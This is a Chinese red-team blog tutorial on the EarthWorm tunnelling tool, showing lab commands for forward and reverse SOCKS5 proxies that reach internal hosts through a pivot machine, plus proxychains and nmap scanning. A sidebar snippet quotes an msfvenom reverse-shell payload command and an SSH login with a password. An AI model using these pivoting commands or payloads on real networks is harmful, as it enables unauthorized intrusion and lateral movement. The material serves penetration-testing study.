红队隧道应用篇之EarthWorm内网穿透(七)

最新推荐文章于 2024-04-30 20:09:14 发布
最新推荐文章于 2024-04-30 20:09:14 发布
阅读量262 收藏
点赞数
分类专栏: 红队的自我修养 文章标签: 网络安全 安全 web安全 windows 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/132722862
版权

简介

EW(蚯蚓突破)是一款功能强大的网络穿透工具,它具备SOCKS5服务架设和端口转发两大核心功能,能够应对复杂的网络环境,并实现网络穿透。通过正向、反向、多级级联等方式,EW可以在防火墙限制下创建网络隧道,达到访问内网资源的目的。

EW的主要特点如下:

  1. 跨平台支持:EW提供了多种可执行文件,支持Linux、Windows、MacOS和Arm-Linux等操作系统,实现了广泛的平台兼容性。
  2. 强大的穿透能力:EW能够实现正向、反向、多级级联等多种穿透方式,可根据不同的网络环境进行灵活配置。
  3. 高效的端口转发:用户可通过EW的端口转发功能实现内外网之间的通信,方便用户访问内网资源。
  4. SOCKS5服务架设:通过EW的SOCKS5代理服务,用户可以在复杂网络环境下进行安全、高效的网络访问。
  5. 简单易用:EW的使用方法相对简单,用户只需根据需求进行基本配置即可实现网络穿透

正向代理

拓扑环境

image-20221029170636693

操作步骤

在代理服务器win7打开ew执行如下命令, 开启socks5协议监听本机的6666端口

ew_for_win.exe -s ssocksd -l 6666
image-20221029142208378

在攻击机的浏览器设置socks5代理: 192.168.47.149:6666, 随后可正常访问内网主机的web端口

image-20221029142557996 image-20221029142746814

若你的攻击机为kali的话, 可以设置proxychains的配置文件: vim /etc/proxychains.conf, 添加上socks5的代理服务器ip及端口: socks5 192.168.47.149 6666

image-20221029143310308

使用proxychains命令配合nmap扫描内网主机的指定端口: proxychains nmap -sT -Pn -p 80 192.168.52.148

image-20221029143543132

反向代理

拓扑环境

image-20221029170245675

操作步骤

在代理服务器上执行如下命令, 意思是将本机的1080端口的数据转发至6666端口

ew_for_Win.exe -s rcscocks -l 1080 -e 6666
image-20221029165447476

在内网主机执行如下命令, 意思是将本机的所有流量转发至192.168.52.143的6666端口

ew_for_Win.exe -s rsscocks -d 192.168.52.143 -e 6666
image-20221029165524419

在攻击机设置浏览器的socks5代理为192.168.47.149:1080, 随后可直接访问内网主机的web服务

image-20221029165609560 image-20221029165716968
Henry404s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
内网渗透-Earthworm的简单使用(内网穿透工具)
lza20001103的博客
08-11 1773
内网渗透-Earthworm的简单使用(内网穿透工具)
实战攻防之红队视角下的防御体系突破.docx
08-23
实战攻防之红队视角下的防御体系突破
ew代理三层靶机实验穿透
m0_58595840的博客
01-11 1115
EW工具实现三层内网穿透
隧道应用4-内网穿透EW的简单使用
Welcome To Myon'Blog !
01-14 626
使用另一台主机访问该主机的 8888 端口,该主机 IP 为192.168.249.1。lcx_slave/lcx_listen/lcx_tran + 端口转发参数。则会直接跳转到 192.168.249.129 的dvwa靶场服务。通过跳板机配置的端口转发进而访问到内网其他主机的服务。与netsh端口映射内网类似,也是通过跳板机实现。装好工具EW,这里以Windows版本做演示。停掉 ew ,再次访问,则无法加载页面。以上就是关于 ew 的一个简单用法。在 cmd 里面执行如下命令。
内网渗透工具Earthworm简单使用
1
02-15 3124
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。 项目地址:https://github.com/idlefire/ew 打开项目的文件,里面非常清楚的写了如何使用,我们
【渗透测试】ew代理三层靶机穿透+proxifier配置规则
serendipity1130的博客
09-02 2595
1.远程连接: ssh [email protected] W6WEwrqD 2.msf生成木马: cd /usr/share/metasploit-framework ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.177.228.128 LPORT=1234 -f elf > /home/load.elf 3.上传木马payload.elf文件到一层靶机: scp -p load.elf yansiyu@
内网穿透大杀器--EarthWorm
热门推荐
大方子
08-24 2万+
0x00 前言如果感觉本文对你有帮助,请在文章末尾点个赞,谢谢表哥们支持! 当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了? 不来一次内网漫游,渗透是不完整的,哈哈。 本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。 它强在哪些方面呢? 1.可穿...
ew穿透
小晓晓晓林的博客
02-20 2750
EW是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。 目前工具提供六种链路状态...
内网端口转发及穿透
jsd2root的博客
03-07 2万+
最近尝试了一些内网端口的转发和内网穿透,现在一起总结一下。 0x01 正向和反向代理 正向代理中,proxy 和 client 同属一个 LAN,对 server 透明; 反向代理中,proxy 和 server 同属一个 LAN,对 client 透明。 实际上 proxy 在两种代理中做的事都是代为收发请求和响应,不过从结构上来看正好左右互换了下,所以把前者那种代理方式叫做正向代理,后...
红队攻防手册,红队攻防教程
04-20
红队攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
内网渗透攻击线路图.pdf
03-21
内网渗透攻击线路图.pdf
HW弹药库之红队作战手册.zip
08-19
0x01 入口权限获取[前期侦察,搜集阶段本身就不存在...0x08 内网安全 [ 内网常用 "隧道"" / "转发"" / "代理"" 穿透手法 提炼汇总 ,防御重点 ] 0x09 域内网安全 [ 域内常用攻击手法 ( 域渗透 ),提炼汇总,防御重点 ]
红队渗透打点工具-FindUpload
03-07
FindUpload是一款红队打点工具,帮助渗透测试人员批量url快速发现文件上传点和登录框,提高渗透测试效率和减少手工发现时间。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
CNCERT:关于汽车数据处理4项安全要求检测情况的通报 (第一批)
最新发布
南七小僧的学海无涯
04-30 663
本次检测根据《汽车数据安全管理若干规定(试行)》有关要求,按照GB/T 41871-2022《信息安全技术 汽车数据处理安全要求》和T/CAAMTB 77-2022《汽车传输视频及图像脱敏技术要求与方法》相关技术标准,并参考《汽车数据通用要求(报批稿)》附录C组织实施。检测采用相同的测试要求、测试环境、技术标准和测试流程,包括车外人脸信息等匿名化处理、默认不收集座舱数据、座舱数据车内处理以及处理个人信息显著告知4项要求。e.查阅、复制其个人信息以及删除车内、请求删除已经提供给车外的个人信息的方式和途径;
Linux服务器安全基础 - 查看入侵痕迹
eagle89的专栏
04-30 585
Linux服务器安全基础 - 查看入侵痕迹
企业计算机服务器中了rmallox勒索病毒怎么办?Rmallox勒索病毒解密流程工具
M99W1230的博客
04-26 498
在网络飞速发展的时代,企业离不开网络,网络为企业的生产运营提供了极大便利,加快了企业进步的步伐,依靠网络可以开展各项工作业务,通过网络数据整合,可以更方便企业办公。Rmallox勒索病毒属于mallox勒索家族,属于早期的勒索病毒,随着网络技术的不断发展,mallox勒索病毒做过多次升级调整,而rmallox勒索病毒是近期新升级的勒索病毒,具有较强的攻击与加密能力,一旦被攻击很难自行破解恢复,经过云天数据恢复中心对rmallox勒索病毒的解密处理,为大家整理了以下有关该勒索病毒的相关信息。
网络安全实训Day16
Yisitelz的博客
04-26 673
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
百度安全议题入选Blackhat Asia以硬技术发现“芯”问题
Baidu_Secrity的博客
04-24 761
因此,跨缓存攻击的效率直接决定了安卓上众多基于堆栈的漏洞利用成功率。结合这些漏洞,议题依次分析了四种威胁模型中的典型漏洞案例,并介绍了Netlink相关漏洞的验证和利用方法,最后为厂商使用Netlink提供了最前沿的安全建议。百度安全是百度公司旗下以AI为核心打造的安全品牌,基于百度各业务线全技术栈的安全实践总结,在基础安全、数据安全、业务安全、车与IoT安全打造四大产品矩阵,面向行业和合作伙伴输出安全产品与行业一体化解决方案,在智能制造、智慧能源、智慧政务、智慧金融、智能汽车等领域已有丰富实践。
goby红队版poc
08-20
Goby红队版POC通过发现、测试和利用网络系统和应用程序中的漏洞,帮助安全团队更好地保护组织的网络。 Goby红队版POC的主要功能包括漏洞扫描、漏洞检测和漏洞利用。它可以扫描网络目标,查找可能存在的漏洞,并生成...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值